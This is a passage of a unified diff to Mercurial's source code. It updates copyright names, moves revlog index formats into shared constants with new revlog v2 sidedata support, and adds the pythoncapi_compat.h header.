- path = self._ui.expandpath(self._output)
+ path = util.expandpath(self._output)
self._fp = open(path, b'wb')
elif pycompat.iswindows:
# parse escape sequence by win32print()
--- a/mercurial/pure/bdiff.py Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/pure/bdiff.py Tue Apr 20 11:01:06 2021 -0400
@@ -1,6 +1,6 @@
# bdiff.py - Python implementation of bdiff.c
#
-# Copyright 2009 Matt Mackall <mpm@selenic.com> and others
+# Copyright 2009 Olivia Mackall <olivia@selenic.com> and others
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.
--- a/mercurial/pure/charencode.py Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/pure/charencode.py Tue Apr 20 11:01:06 2021 -0400
@@ -1,6 +1,6 @@
# charencode.py - miscellaneous character encoding
#
-# Copyright 2005-2009 Matt Mackall <mpm@selenic.com> and others
+# Copyright 2005-2009 Olivia Mackall <olivia@selenic.com> and others
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.
--- a/mercurial/pure/mpatch.py Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/pure/mpatch.py Tue Apr 20 11:01:06 2021 -0400
@@ -1,6 +1,6 @@
# mpatch.py - Python implementation of mpatch.c
#
-# Copyright 2009 Matt Mackall <mpm@selenic.com> and others
+# Copyright 2009 Olivia Mackall <olivia@selenic.com> and others
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.
--- a/mercurial/pure/osutil.py Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/pure/osutil.py Tue Apr 20 11:01:06 2021 -0400
@@ -1,6 +1,6 @@
# osutil.py - pure Python version of osutil.c
#
-# Copyright 2009 Matt Mackall <mpm@selenic.com> and others
+# Copyright 2009 Olivia Mackall <olivia@selenic.com> and others
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.
--- a/mercurial/pure/parsers.py Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/pure/parsers.py Tue Apr 20 11:01:06 2021 -0400
@@ -1,6 +1,6 @@
# parsers.py - Python implementation of parsers.c
#
-# Copyright 2009 Matt Mackall <mpm@selenic.com> and others
+# Copyright 2009 Olivia Mackall <olivia@selenic.com> and others
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.
@@ -17,6 +17,7 @@
)
from ..revlogutils import nodemap as nodemaputil
+from ..revlogutils import constants as revlog_constants
stringio = pycompat.bytesio
@@ -33,13 +34,6 @@
return x
-indexformatng = b">Qiiiiii20s12x"
-indexfirst = struct.calcsize(b'Q')
-sizeint = struct.calcsize(b'i')
-indexsize = struct.calcsize(indexformatng)
-nullitem = (0, 0, 0, -1, -1, -1, -1, nullid)
-
-
def gettype(q):
return int(q & 0xFFFF)
@@ -49,6 +43,19 @@
class BaseIndexObject(object):
+ # Format of an index entry according to Python's `struct` language
+ index_format = revlog_constants.INDEX_ENTRY_V1
+ # Size of a C unsigned long long int, platform independent
+ big_int_size = struct.calcsize(b'>Q')
+ # Size of a C long int, platform independent
+ int_size = struct.calcsize(b'>i')
+ # An empty index entry, used as a default value to be overridden, or nullrev
+ null_item = (0, 0, 0, -1, -1, -1, -1, nullid)
+
+ @util.propertycache
+ def entry_size(self):
+ return self.index_format.size
+
@property
def nodemap(self):
msg = b"index.nodemap is deprecated, use index.[has_node|rev|get_rev]"
@@ -94,7 +101,7 @@
def append(self, tup):
if '_nodemap' in vars(self):
self._nodemap[tup[7]] = len(self)
- data = _pack(indexformatng, *tup)
+ data = self.index_format.pack(*tup)
self._extra.append(data)
def _check_index(self, i):
@@ -105,14 +112,14 @@
def __getitem__(self, i):
if i == -1:
- return nullitem
+ return self.null_item
self._check_index(i)
if i >= self._lgt:
data = self._extra[i - self._lgt]
else:
index = self._calculate_index(i)
- data = self._data[index : index + indexsize]
- r = _unpack(indexformatng, data)
+ data = self._data[index : index + self.entry_size]
+ r = self.index_format.unpack(data)
if self._lgt and i == 0:
r = (offset_type(0, gettype(r[0])),) + r[1:]
return r
@@ -120,13 +127,13 @@
class IndexObject(BaseIndexObject):
def __init__(self, data):
- assert len(data) % indexsize == 0
+ assert len(data) % self.entry_size == 0
self._data = data
- self._lgt = len(data) // indexsize
+ self._lgt = len(data) // self.entry_size
self._extra = []
def _calculate_index(self, i):
- return i * indexsize
+ return i * self.entry_size
def __delitem__(self, i):
if not isinstance(i, slice) or not i.stop == -1 or i.step is not None:
@@ -135,7 +142,7 @@
self._check_index(i)
self._stripnodes(i)
if i < self._lgt:
- self._data = self._data[: i * indexsize]
+ self._data = self._data[: i * self.entry_size]
self._lgt = i
self._extra = []
else:
@@ -198,14 +205,16 @@
if lgt is not None:
self._offsets = [0] * lgt
count = 0
- while off <= len(self._data) - indexsize:
+ while off <= len(self._data) - self.entry_size:
+ start = off + self.big_int_size
(s,) = struct.unpack(
- b'>i', self._data[off + indexfirst : off + sizeint + indexfirst]
+ b'>i',
+ self._data[start : start + self.int_size],
)
if lgt is not None:
self._offsets[count] = off
count += 1
- off += indexsize + s
+ off += self.entry_size + s
if off != len(self._data):
raise ValueError(b"corrupted data")
return count
@@ -227,10 +236,68 @@
return self._offsets[i]
-def parse_index2(data, inline):
+def parse_index2(data, inline, revlogv2=False):
if not inline:
- return IndexObject(data), None
- return InlinedIndexObject(data, inline), (0, data)
+ cls = IndexObject2 if revlogv2 else IndexObject
+ return cls(data), None
+ cls = InlinedIndexObject2 if revlogv2 else InlinedIndexObject
+ return cls(data, inline), (0, data)
+
+
+class Index2Mixin(object):
+ index_format = revlog_constants.INDEX_ENTRY_V2
+ null_item = (0, 0, 0, -1, -1, -1, -1, nullid, 0, 0)
+
+ def replace_sidedata_info(self, i, sidedata_offset, sidedata_length):
+ """
+ Replace an existing index entry's sidedata offset and length with new
+ ones.
+ This cannot be used outside of the context of sidedata rewriting,
+ inside the transaction that creates the revision `i`.
+ """
+ if i < 0:
+ raise KeyError
+ self._check_index(i)
+ sidedata_format = b">Qi"
+ packed_size = struct.calcsize(sidedata_format)
+ if i >= self._lgt:
+ packed = _pack(sidedata_format, sidedata_offset, sidedata_length)
+ old = self._extra[i - self._lgt]
+ new = old[:64] + packed + old[64 + packed_size :]
+ self._extra[i - self._lgt] = new
+ else:
+ msg = b"cannot rewrite entries outside of this transaction"
+ raise KeyError(msg)
+
+
+class IndexObject2(Index2Mixin, IndexObject):
+ pass
+
+
+class InlinedIndexObject2(Index2Mixin, InlinedIndexObject):
+ def _inline_scan(self, lgt):
+ sidedata_length_pos = 72
+ off = 0
+ if lgt is not None:
+ self._offsets = [0] * lgt
+ count = 0
+ while off <= len(self._data) - self.entry_size:
+ start = off + self.big_int_size
+ (data_size,) = struct.unpack(
+ b'>i',
+ self._data[start : start + self.int_size],
+ )
+ start = off + sidedata_length_pos
+ (side_data_size,) = struct.unpack(
+ b'>i', self._data[start : start + self.int_size]
+ )
+ if lgt is not None:
+ self._offsets[count] = off
+ count += 1
+ off += self.entry_size + data_size + side_data_size
+ if off != len(self._data):
+ raise ValueError(b"corrupted data")
+ return count
def parse_index_devel_nodemap(data, inline):
--- a/mercurial/pushkey.py Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/pushkey.py Tue Apr 20 11:01:06 2021 -0400
@@ -1,6 +1,6 @@
# pushkey.py - dispatching for pushing and pulling keys
#
-# Copyright 2010 Matt Mackall <mpm@selenic.com>
+# Copyright 2010 Olivia Mackall <olivia@selenic.com>
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.
--- a/mercurial/pvec.py Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/pvec.py Tue Apr 20 11:01:06 2021 -0400
@@ -1,6 +1,6 @@
# pvec.py - probabilistic vector clocks for Mercurial
#
-# Copyright 2012 Matt Mackall <mpm@selenic.com>
+# Copyright 2012 Olivia Mackall <olivia@selenic.com>
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.
--- /dev/null Thu Jan 01 00:00:00 1970 +0000
+++ b/mercurial/pythoncapi_compat.h Tue Apr 20 11:01:06 2021 -0400
@@ -0,0 +1,283 @@
+// Header file providing new functions of the Python C API to old Python
+// versions.
+//
+// File distributed under the MIT license.
+//
+// Homepage:
+// https://github.com/pythoncapi/pythoncapi_compat
+//
+// Latest version:
+// https://raw.githubusercontent.com/pythoncapi/pythoncapi_compat/master/pythoncapi_compat.h
+
+#ifndef PYTHONCAPI_COMPAT
+#define PYTHONCAPI_COMPAT
+
+#ifdef __cplusplus
+extern "C" {
+#endif
+
+#include <Python.h>
+#include "frameobject.h" // PyFrameObject, PyFrame_GetBack()
+
+
+/* VC 2008 doesn't know about the inline keyword. */
+#if defined(_MSC_VER) && _MSC_VER < 1900
+#define inline __forceinline
+#endif
+
+// Cast argument to PyObject* type.
+#ifndef _PyObject_CAST
+# define _PyObject_CAST(op) ((PyObject*)(op))
+#endif
+
+
+// bpo-42262 added Py_NewRef() to Python 3.10.0a3
+#if PY_VERSION_HEX < 0x030a00A3 && !defined(Py_NewRef)
+static inline PyObject* _Py_NewRef(PyObject *obj)
+{
+ Py_INCREF(obj);
+ return obj;
+}
+#define Py_NewRef(obj) _Py_NewRef(_PyObject_CAST(obj))
+#endif
+
+
+// bpo-42262 added Py_XNewRef() to Python 3.10.0a3
+#if PY_VERSION_HEX < 0x030a00A3 && !defined(Py_XNewRef)
+static inline PyObject* _Py_XNewRef(PyObject *obj)
+{
+ Py_XINCREF(obj);
+ return obj;
+}
+#define Py_XNewRef(obj) _Py_XNewRef(_PyObject_CAST(obj))
+#endif
+
+
+// bpo-39573 added Py_SET_REFCNT() to Python 3.9.0a4
+#if PY_VERSION_HEX < 0x030900A4 && !defined(Py_SET_REFCNT)
+static inline void _Py_SET_REFCNT(PyObject *ob, Py_ssize_t refcnt)
+{
+ ob->ob_refcnt = refcnt;
+}
+#define Py_SET_REFCNT(ob, refcnt) _Py_SET_REFCNT((PyObject*)(ob), refcnt)
+#endif
+
+
+// bpo-39573 added Py_SET_TYPE() to Python 3.9.0a4
+#if PY_VERSION_HEX < 0x030900A4 && !defined(Py_SET_TYPE)
+static inline void
+_Py_SET_TYPE(PyObject *ob, PyTypeObject *type)
+{
+ ob->ob_type = type;
+}
+#define Py_SET_TYPE(ob, type) _Py_SET_TYPE((PyObject*)(ob), type)
+#endif
+
+
+// bpo-39573 added Py_SET_SIZE() to Python 3.9.0a4
+#if PY_VERSION_HEX < 0x030900A4 && !defined(Py_SET_SIZE)
+static inline void
+_Py_SET_SIZE(PyVarObject *ob, Py_ssize_t size)
+{
+ ob->ob_size = size;
+}
+#define Py_SET_SIZE(ob, size) _Py_SET_SIZE((PyVarObject*)(ob), size)
+#endif
+
+
+// bpo-40421 added PyFrame_GetCode() to Python 3.9.0b1
+#if PY_VERSION_HEX < 0x030900B1
+static inline PyCodeObject*
+PyFrame_GetCode(PyFrameObject *frame)
+{
+ PyCodeObject *code;
+ assert(frame != NULL);
+ code = frame->f_code;
+ assert(code != NULL);
+ Py_INCREF(code);
+ return code;
+}
+#endif
+
+static inline PyCodeObject*
+_PyFrame_GetCodeBorrow(PyFrameObject *frame)
+{
+ PyCodeObject *code = PyFrame_GetCode(frame);
+ Py_DECREF(code);
+ return code; // borrowed reference
+}
+
+
+// bpo-40421 added PyFrame_GetCode() to Python 3.9.0b1
+#if PY_VERSION_HEX < 0x030900B1
+static inline PyFrameObject*
+PyFrame_GetBack(PyFrameObject *frame)
+{
+ PyFrameObject *back;
+ assert(frame != NULL);
+ back = frame->f_back;
+ Py_XINCREF(back);
+ return back;
+}
+#endif
+
+static inline PyFrameObject*
+_PyFrame_GetBackBorrow(PyFrameObject *frame)
+{
+ PyFrameObject *back = PyFrame_GetBack(frame);
+ Py_XDECREF(back);
+ return back; // borrowed reference
+}
+
+
+// bpo-39947 added PyThreadState_GetInterpreter() to Python 3.9.0a5
+#if PY_VERSION_HEX < 0x030900A5
+static inline PyInterpreterState *
+PyThreadState_GetInterpreter(PyThreadState *tstate)
+{
+ assert(tstate != NULL);
+ return tstate->interp;
+}
+#endif
+
+
+// bpo-40429 added PyThreadState_GetFrame() to Python 3.9.0b1
+#if PY_VERSION_HEX < 0x030900B1
+static inline PyFrameObject*
+PyThreadState_GetFrame(PyThreadState *tstate)
+{
+ PyFrameObject *frame;
+ assert(tstate != NULL);
+ frame = tstate->frame;
+ Py_XINCREF(frame);
+ return frame;
+}
+#endif
+
+static inline PyFrameObject*
+_PyThreadState_GetFrameBorrow(PyThreadState *tstate)
+{
+ PyFrameObject *frame = PyThreadState_GetFrame(tstate);
+ Py_XDECREF(frame);
+ return frame; // borrowed reference
+}
+
+
+// bpo-39947 added PyInterpreterState_Get() to Python 3.9.0a5
+#if PY_VERSION_HEX < 0x030900A5
+static inline PyInterpreterState *
+PyInterpreterState_Get(void)
+{
+ PyThreadState *tstate;
+ PyInterpreterState *interp;
+
+ tstate = PyThreadState_GET();
+ if (tstate == NULL) {
+ Py_FatalError("GIL released (tstate is NULL)");
+ }
+ interp = tstate->interp;
+ if (interp == NULL) {
+ Py_FatalError("no current interpreter");
+ }
+ return interp;
+}
+#endif
+
+
+// bpo-39947 added PyInterpreterState_Get() to Python 3.9.0a6
+#if 0x030700A1 <= PY_VERSION_HEX && PY_VERSION_HEX < 0x030900A6
+static inline uint64_t
+PyThreadState_GetID(PyThreadState *tstate)
+{
+ assert(tstate != NULL);
+ return tstate->id;
+}
+#endif
+
+
+// bpo-37194 added PyObject_CallNoArgs() to Python 3.9.0a1
+#if PY_VERSION_HEX < 0x030900A1
+static inline PyObject*
+PyObject_CallNoArgs(PyObject *func)
+{
+ return PyObject_CallFunctionObjArgs(func, NULL);
+}
+#endif
+
+
+// bpo-39245 made PyObject_CallOneArg() public (previously called
+// _PyObject_CallOneArg) in Python 3.9.0a4
+#if PY_VERSION_HEX < 0x030900A4
+static inline PyObject*
+PyObject_CallOneArg(PyObject *func, PyObject *arg)
+{
+ return PyObject_CallFunctionObjArgs(func, arg, NULL);
+}
+#endif
+
+
+// bpo-40024 added PyModule_AddType() to Python 3.9.0a5
+#if PY_VERSION_HEX < 0x030900A5
+static inline int
+PyModule_AddType(PyObject *module, PyTypeObject *type)
+{
+ const char *name, *dot;
+
+ if (PyType_Ready(type) < 0) {
+ return -1;
+ }
+
+ // inline _PyType_Name()
+ name = type->tp_name;
+ assert(name != NULL);
+ dot = strrchr(name, '.');
+ if (dot != NULL) {
+ name = dot + 1;
+ }
+
+ Py_INCREF(type);
+ if (PyModule_AddObject(module, name, (PyObject *)type) < 0) {
+ Py_DECREF(type);
+ return -1;
+ }
+
+ return 0;
+}
+#endif
+
+
+// bpo-40241 added PyObject_GC_IsTracked() to Python 3.9.0a6.
+// bpo-4688 added _PyObject_GC_IS_TRACKED() to Python 2.7.0a2.
+#if PY_VERSION_HEX < 0x030900A6
+static inline int
+PyObject_GC_IsTracked(PyObject* obj)
+{
+ return (PyObject_IS_GC(obj) && _PyObject_GC_IS_TRACKED(obj));
+}
+#endif
+
+// bpo-40241 added PyObject_GC_IsFinalized() to Python 3.9.0a6.
+// bpo-18112 added _PyGCHead_FINALIZED() to Python 3.4.0 final.
+#if PY_VERSION_HEX < 0x030900A6 && PY_VERSION_HEX >= 0x030400F0
+static inline int
+PyObject_GC_IsFinalized(PyObject *obj)
+{
+ return (PyObject_IS_GC(obj) && _PyGCHead_FINALIZED((PyGC_Head *)(obj)-1));
+}
+#endif
+
+
+// bpo-39573 added Py_IS_TYPE() to Python 3.9.0a4
+#if PY_VERSION_HEX < 0x030900A4 && !defined(Py_IS_TYPE)
+static inline int
+_Py_IS_TYPE(const PyObject *ob, const PyTypeObject *type) {
+ return ob->ob_type == type;
+}
+#define Py_IS_TYPE(ob, type) _Py_IS_TYPE((const PyObject*)(ob), type)
+#endif
+
+
+#ifdef __cplusplus
+}
+#endif
+#endif // PYTHONCAPI_COMPAT
--- a/mercurial/repair.py Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/repair.py Tue Apr 20 11:01:06 2021 -0400
@@ -1,7 +1,7 @@
# repair.py - functions for repository repair for mercurial
#
# Copyright 2005, 2006 Chris Mason <mason@suse.com>
-# Copyright 2007 Matt Mackall
+# Copyright 2007 Olivia Mackall
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.
@@ -28,11 +28,11 @@
pycompat,
requirements,
scmutil,
- util,
)
from .utils import (
hashutil,
stringutil,
+ urlutil,
)
@@ -245,7 +245,7 @@
tmpbundleurl = b'bundle:' + vfs.join(tmpbundlefile)
txnname = b'strip'
if not isinstance(gen, bundle2.unbundle20):
- txnname = b"strip\n%s" % util.hidepassword(tmpbundleurl)
+ txnname = b"strip\n%s" % urlutil.hidepassword(tmpbundleurl)
with repo.transaction(txnname) as tr:
bundle2.applybundle(
repo, gen, tr, source=b'strip', url=tmpbundleurl
@@ -308,11 +308,12 @@
if not tostrip:
return None
- newbmtarget, updatebm = _bookmarkmovements(repo, tostrip)
+ backupfile = None
if backup:
node = tostrip[0]
backupfile = _createstripbackup(repo, tostrip, node, topic)
+ newbmtarget, updatebm = _bookmarkmovements(repo, tostrip)
with repo.transaction(b'strip') as tr:
phases.retractboundary(repo, tr, phases.archived, tostrip)
bmchanges = [(m, repo[newbmtarget].node()) for m in updatebm]
@@ -427,7 +428,7 @@
if scmutil.istreemanifest(repo):
# This logic is safe if treemanifest isn't enabled, but also
# pointless, so we skip it if treemanifest isn't enabled.
- for unencoded, encoded, size in repo.store.datafiles():
+ for t, unencoded, encoded, size in repo.store.datafiles():
if unencoded.startswith(b'meta/') and unencoded.endswith(
b'00manifest.i'
):
@@ -442,7 +443,7 @@
"""
repo = repo.unfiltered()
- if b'fncache' not in repo.requirements:
+ if requirements.FNCACHE_REQUIREMENT not in repo.requirements:
ui.warn(
_(
b'(not rebuilding fncache because repository does not '
--- a/mercurial/requirements.py Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/requirements.py Tue Apr 20 11:01:06 2021 -0400
@@ -1,12 +1,17 @@
# requirements.py - objects and functions related to repository requirements
#
-# Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
+# Copyright 2005-2007 Olivia Mackall <olivia@selenic.com>
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.
from __future__ import absolute_import
+GENERALDELTA_REQUIREMENT = b'generaldelta'
+DOTENCODE_REQUIREMENT = b'dotencode'
+STORE_REQUIREMENT = b'store'
+FNCACHE_REQUIREMENT = b'fncache'
+
# When narrowing is finalized and no longer subject to format changes,
# we should move this to just "narrow" or similar.
NARROW_REQUIREMENT = b'narrowhg-experimental'
@@ -21,9 +26,11 @@
# Stores manifest in Tree structure
TREEMANIFEST_REQUIREMENT = b'treemanifest'
+REVLOGV1_REQUIREMENT = b'revlogv1'
+
# Increment the sub-version when the revlog v2 format changes to lock out old
# clients.
-REVLOGV2_REQUIREMENT = b'exp-revlogv2.1'
+REVLOGV2_REQUIREMENT = b'exp-revlogv2.2'
# A repository with the sparserevlog feature will have delta chains that
# can spread over a larger span. Sparse reading cuts these large spans into
--- a/mercurial/revlog.py Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/revlog.py Tue Apr 20 11:01:06 2021 -0400
@@ -1,6 +1,6 @@
# revlog.py - storage back-end for mercurial
#
-# Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
+# Copyright 2005-2007 Olivia Mackall <olivia@selenic.com>
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.
@@ -13,6 +13,7 @@
from __future__ import absolute_import
+import binascii
import collections
import contextlib
import errno
@@ -28,6 +29,7 @@
nullhex,
nullid,
nullrev,
+ sha1nodeconstants,
short,
wdirfilenodeids,
wdirhex,
@@ -39,6 +41,10 @@
from .revlogutils.constants import (
FLAG_GENERALDELTA,
FLAG_INLINE_DATA,
+ INDEX_ENTRY_V0,
+ INDEX_ENTRY_V1,
+ INDEX_ENTRY_V2,
+ INDEX_HEADER,
REVLOGV0,
REVLOGV1,
REVLOGV1_FLAGS,
@@ -119,10 +125,10 @@
# Flag processors for REVIDX_ELLIPSIS.
def ellipsisreadprocessor(rl, text):
- return text, False, {}
-
-
-def ellipsiswriteprocessor(rl, text, sidedata):
+ return text, False
+
+
+def ellipsiswriteprocessor(rl, text):
return text, False
@@ -203,6 +209,7 @@
baserevisionsize = attr.ib()
revision = attr.ib()
delta = attr.ib()
+ sidedata = attr.ib()
linknode = attr.ib(default=None)
@@ -214,20 +221,9 @@
node = attr.ib(default=None)
-# index v0:
-# 4 bytes: offset
-# 4 bytes: compressed length
-# 4 bytes: base rev
-# 4 bytes: link rev
-# 20 bytes: parent 1 nodeid
-# 20 bytes: parent 2 nodeid
-# 20 bytes: nodeid
-indexformatv0 = struct.Struct(b">4l20s20s20s")
-indexformatv0_pack = indexformatv0.pack
-indexformatv0_unpack = indexformatv0.unpack
-
-
class revlogoldindex(list):
+ entry_size = INDEX_ENTRY_V0.size
+
@property
def nodemap(self):
msg = b"index.nodemap is deprecated, use index.[has_node|rev|get_rev]"
@@ -279,11 +275,8 @@
class revlogoldio(object):
- def __init__(self):
- self.size = indexformatv0.size
-
def parseindex(self, data, inline):
- s = self.size
+ s = INDEX_ENTRY_V0.size
index = []
nodemap = nodemaputil.NodeMap({nullid: nullrev})
n = off = 0
@@ -291,7 +284,7 @@
while off + s <= l:
cur = data[off : off + s]
off += s
- e = indexformatv0_unpack(cur)
+ e = INDEX_ENTRY_V0.unpack(cur)
# transform to revlogv1 format
e2 = (
offset_type(e[0], 0),
@@ -311,6 +304,13 @@
return index, None
def packentry(self, entry, node, version, rev):
+ """return the binary representation of an entry
+
+ entry: a tuple containing all the values (see index.__getitem__)
+ node: a callback to convert a revision to nodeid
+ version: the changelog version
+ rev: the revision number
+ """
if gettype(entry[0]):
raise error.RevlogError(
_(b'index entry flags need revlog version 1')
@@ -324,24 +324,8 @@
node(entry[6]),
entry[7],
)
- return indexformatv0_pack(*e2)
-
-
-# index ng:
-# 6 bytes: offset
-# 2 bytes: flags
-# 4 bytes: compressed length
-# 4 bytes: uncompressed length
-# 4 bytes: base rev
-# 4 bytes: link rev
-# 4 bytes: parent 1 rev
-# 4 bytes: parent 2 rev
-# 32 bytes: nodeid
-indexformatng = struct.Struct(b">Qiiiiii20s12x")
-indexformatng_pack = indexformatng.pack
-versionformat = struct.Struct(b">I")
-versionformat_pack = versionformat.pack
-versionformat_unpack = versionformat.unpack
+ return INDEX_ENTRY_V0.pack(*e2)
+
# corresponds to uncompressed length of indexformatng (2 gigs, 4-byte
# signed integer)
@@ -349,18 +333,27 @@
class revlogio(object):
- def __init__(self):
- self.size = indexformatng.size
-
def parseindex(self, data, inline):
# call the C implementation to parse the index data
index, cache = parsers.parse_index2(data, inline)
return index, cache
def packentry(self, entry, node, version, rev):
- p = indexformatng_pack(*entry)
+ p = INDEX_ENTRY_V1.pack(*entry)
if rev == 0:
- p = versionformat_pack(version) + p[4:]
+ p = INDEX_HEADER.pack(version) + p[4:]
+ return p
+
+
+class revlogv2io(object):
+ def parseindex(self, data, inline):
+ index, cache = parsers.parse_index2(data, inline, revlogv2=True)
+ return index, cache
+
+ def packentry(self, entry, node, version, rev):
+ p = INDEX_ENTRY_V2.pack(*entry)
+ if rev == 0:
+ p = INDEX_HEADER.pack(version) + p[4:]
return p
@@ -421,6 +414,11 @@
If `upperboundcomp` is not None, this is the expected maximal gain from
compression for the data content.
+
+ `concurrencychecker` is an optional function that receives 3 arguments: a
+ file handle, a filename, and an expected position. It should check whether
+ the current position in the file handle is valid, and log/warn/fail (by
+ raising).
"""
_flagserrorclass = error.RevlogError
@@ -435,6 +433,7 @@
censorable=False,
upperboundcomp=None,
persistentnodemap=False,
+ concurrencychecker=None,
):
"""
create a revlog object
@@ -448,14 +447,9 @@
self.datafile = datafile or (indexfile[:-2] + b".d")
self.nodemap_file = None
if persistentnodemap:
- if indexfile.endswith(b'.a'):
- pending_path = indexfile[:-4] + b".n.a"
- if opener.exists(pending_path):
- self.nodemap_file = pending_path
- else:
- self.nodemap_file = indexfile[:-4] + b".n"
- else:
- self.nodemap_file = indexfile[:-2] + b".n"
+ self.nodemap_file = nodemaputil.get_nodemap_file(
+ opener, self.indexfile
+ )
self.opener = opener
# When True, indexfile is opened with checkambig=True at writing, to
@@ -495,6 +489,8 @@
self._loadindex()
+ self._concurrencychecker = concurrencychecker
+
def _loadindex(self):
mmapindexthreshold = None
opts = self.opener.options
@@ -531,8 +527,6 @@
if self._mmaplargeindex and b'mmapindexthreshold' in opts:
mmapindexthreshold = opts[b'mmapindexthreshold']
self.hassidedata = bool(opts.get(b'side-data', False))
- if self.hassidedata:
- self._flagprocessors[REVIDX_SIDEDATA] = sidedatautil.processors
self._sparserevlog = bool(opts.get(b'sparse-revlog', False))
withsparseread = bool(opts.get(b'with-sparse-read', False))
# sparse-revlog forces sparse-read
@@ -575,7 +569,7 @@
else:
indexdata = f.read()
if len(indexdata) > 0:
- versionflags = versionformat_unpack(indexdata[:4])[0]
+ versionflags = INDEX_HEADER.unpack(indexdata[:4])[0]
self._initempty = False
else:
versionflags = newversionflags
@@ -617,7 +611,11 @@
% (flags >> 16, fmt, self.indexfile)
)
- self._inline = versionflags & FLAG_INLINE_DATA
+ # There is a bug in the transaction handling when going from an
+ # inline revlog to a separate index and data file. Turn it off until
+ # it's fixed, since v2 revlogs sometimes get rewritten on exchange.
+ # See issue6485
+ self._inline = False
# generaldelta implied by version 2 revlogs.
self._generaldelta = True
@@ -625,6 +623,10 @@
raise error.RevlogError(
_(b'unknown version (%d) in revlog %s') % (fmt, self.indexfile)
)
+
+ self.nodeconstants = sha1nodeconstants
+ self.nullid = self.nodeconstants.nullid
+
# sparse-revlog can't be on without general-delta (issue6056)
if not self._generaldelta:
self._sparserevlog = False
@@ -647,6 +649,8 @@
self._io = revlogio()
if self.version == REVLOGV0:
self._io = revlogoldio()
+ elif fmt == REVLOGV2:
+ self._io = revlogv2io()
elif devel_nodemap:
self._io = NodemapRevlogIO()
elif use_rust_index:
@@ -831,6 +835,11 @@
def length(self, rev):
return self.index[rev][1]
+ def sidedata_length(self, rev):
+ if self.version & 0xFFFF != REVLOGV2:
+ return 0
+ return self.index[rev][9]
+
def rawsize(self, rev):
"""return the length of the uncompressed text for a given revision"""
l = self.index[rev][2]
@@ -875,8 +884,10 @@
if rev == wdirrev:
raise error.WdirUnsupported
raise
-
- return entry[5], entry[6]
+ if entry[5] == nullrev:
+ return entry[6], entry[5]
+ else:
+ return entry[5], entry[6]
# fast parentrevs(rev) where rev isn't filtered
_uncheckedparentrevs = parentrevs
@@ -897,7 +908,11 @@
def parents(self, node):
i = self.index
d = i[self.rev(node)]
- return i[d[5]][7], i[d[6]][7] # map revisions to nodes inline
+ # inline node() to avoid function call overhead
+ if d[5] == nullid:
+ return i[d[6]][7], i[d[5]][7]
+ else:
+ return i[d[5]][7], i[d[6]][7]
def chainlen(self, rev):
return self._chaininfo(rev)[0]
@@ -1694,8 +1709,8 @@
end = int(iend[0] >> 16) + iend[1]
if self._inline:
- start += (startrev + 1) * self._io.size
- end += (endrev + 1) * self._io.size
+ start += (startrev + 1) * self.index.entry_size
+ end += (endrev + 1) * self.index.entry_size
length = end - start
return start, self._getsegment(start, length, df=df)
@@ -1729,7 +1744,7 @@
start = self.start
length = self.length
inline = self._inline
- iosize = self._io.size
+ iosize = self.index.entry_size
buffer = util.buffer
l = []
@@ -1828,7 +1843,7 @@
elif operation == b'read':
return flagutil.processflagsread(self, text, flags)
else: # write operation
- return flagutil.processflagswrite(self, text, flags, None)
+ return flagutil.processflagswrite(self, text, flags)
def revision(self, nodeorrev, _df=None, raw=False):
"""return an uncompressed revision of a given node or revision
@@ -1873,10 +1888,17 @@
# revision or might need to be processed to retrieve the revision.
rev, rawtext, validated = self._rawtext(node, rev, _df=_df)
+ if self.version & 0xFFFF == REVLOGV2:
+ if rev is None:
+ rev = self.rev(node)
+ sidedata = self._sidedata(rev)
+ else:
+ sidedata = {}
+
if raw and validated:
# if we don't want to process the raw text and that raw
# text is cached, we can exit early.
- return rawtext, {}
+ return rawtext, sidedata
if rev is None:
rev = self.rev(node)
# the revlog's flag for this revision
@@ -1885,20 +1907,14 @@
if validated and flags == REVIDX_DEFAULT_FLAGS:
# no extra flags set, no flag processor runs, text = rawtext
- return rawtext, {}
-
- sidedata = {}
+ return rawtext, sidedata
+
if raw:
validatehash = flagutil.processflagsraw(self, rawtext, flags)
text = rawtext
else:
- try:
- r = flagutil.processflagsread(self, rawtext, flags)
- except error.SidedataHashError as exc:
- msg = _(b"integrity check failed on %s:%s sidedata key %d")
- msg %= (self.indexfile, pycompat.bytestr(rev), exc.sidedatakey)
- raise error.RevlogError(msg)
- text, validatehash, sidedata = r
+ r = flagutil.processflagsread(self, rawtext, flags)
+ text, validatehash = r
if validatehash:
self.checkhash(text, node, rev=rev)
if not validated:
@@ -1949,6 +1965,21 @@
del basetext # let us have a chance to free memory early
return (rev, rawtext, False)
+ def _sidedata(self, rev):
+ """Return the sidedata for a given revision number."""
+ index_entry = self.index[rev]
+ sidedata_offset = index_entry[8]
+ sidedata_size = index_entry[9]
+
+ if self._inline:
+ sidedata_offset += self.index.entry_size * (1 + rev)
+ if sidedata_size == 0:
+ return {}
+
+ segment = self._getsegment(sidedata_offset, sidedata_size)
+ sidedata = sidedatautil.deserialize_sidedata(segment)
+ return sidedata
+
def rawdata(self, nodeorrev, _df=None):
"""return an uncompressed raw data of a given node or revision number.
@@ -2041,7 +2072,7 @@
# the temp file replace the real index when we exit the context
# manager
- tr.replace(self.indexfile, trindex * self._io.size)
+ tr.replace(self.indexfile, trindex * self.index.entry_size)
